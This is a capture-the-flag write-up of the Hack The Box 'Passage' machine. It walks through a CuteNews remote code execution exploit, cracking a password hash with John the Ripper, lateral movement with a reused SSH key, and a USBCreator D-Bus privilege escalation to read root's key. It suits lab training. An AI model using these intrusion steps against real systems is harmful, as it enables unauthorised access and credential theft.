Hack The Box — Passage — Write up
Passage is a medium difficulty Linux machine that hosts a CuteNews web application. This is found to suffer from a remote command execution vulnerability, which is leveraged to gain a foothold. A CuteNews password hash for the application user paul is discovered and cracked.Owing to password reuse, we can use this to move laterally to the paul system user. A privateSSH key is found to be shared between the system users, which allows us to move laterally tonadav. This user is found to be a member of the sudo group. Enumeration of the vim command line history reveals that the com.ubuntu.USBCreator.conf policy has been edited, in order toallow users of the sudo group to invoke methods of the usb-creator service. The D-Bus serviceUSBCreator is found to suffer from a vulnerability, allowing the password security policy imposed by sudo binary to be bypassed. This is leveraged in order to read privileged files as root.
Scanning and Enumeration
Firstly, We’ll pursue for the basic Nmap scanning of the machine to know the open ports in the box.
$ nmap -sV -sC -v -p- 10.10.10.206
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
http-server-header: Apache/2.4.18 (Ubuntu)_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3983.09 secondsAfter Nmap scan we found the port 22 (SSH) and port 80 (HTTP) are open. Checking for the web page and found a blog page titled “Passage News” with CMS “CuteNews”.
After searching for the exploits available for CuteNews we found:
We found ‘Remote Code Execution’ Exploit for CuteNews 2.1.2 which suffers from vulnerability (CVE-2019–11447).
Get this python script and run it and enter the URL:
This will provide you with the command shell where you can run the commands so from here we can get the reverse shell for the machine.
Spawn a PTY shell by using:
$ python -c 'import pty; pty.spawn("/bin/bash")'Post Enumeration we tried to find out about the users in the box.
$ cat /etc/passwd
After some searching we found some files in the /var/www/html/CuteNews/cdata/users directory.
We found some base64 encoded strings in file 09.php
$ cat 09.php
We decode the base64 encoding to find a hash for the user paul. The password hash : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd. We can try to identify the hash format using hash-identifier.
Let’s crack this hash using John The Ripper.
echo "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd" > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Successfully we got the password for user paul. Let’s login with user paul. The user flag is located in /home/paul/user.txt
After getting user flag we get the .ssh directory in paul home directory where we found authorized_keys file which is for user nadav. Through that we got the shell for nadav user using id_rsa.
$ ssh -i id_rsa nadav@10.10.10.206Now for privilege escalation to get the root shell we transferred linpeas.sh file in the machine. Executing that script we found a vulnerable version of script USBCreator installed on the system.
According to this article, an attacker with access to a user in the sudo group is able to bypass thepassword security policy that is imposed by sudo binary, and overwrite arbitrary files witharbitrary content as root without using password, due to a vulnerability in the USBCreator D-Businterface. Let’s try to copy the id_rsa file of the rootuser using the following command, which is also described in the same article.
The SSH key exists and is copied to the home directory of our current user nadav. This worked and we login as root user using ssh.
$ ssh -i id_rsa root@10.10.10.206
And voila we rooted the box. The root flag can be found in /root/root.txt.
Visit My Hack The Box Profile —
https://app.hackthebox.eu/profile/464208
For any queries contact on my twitter and linkedin profiles -
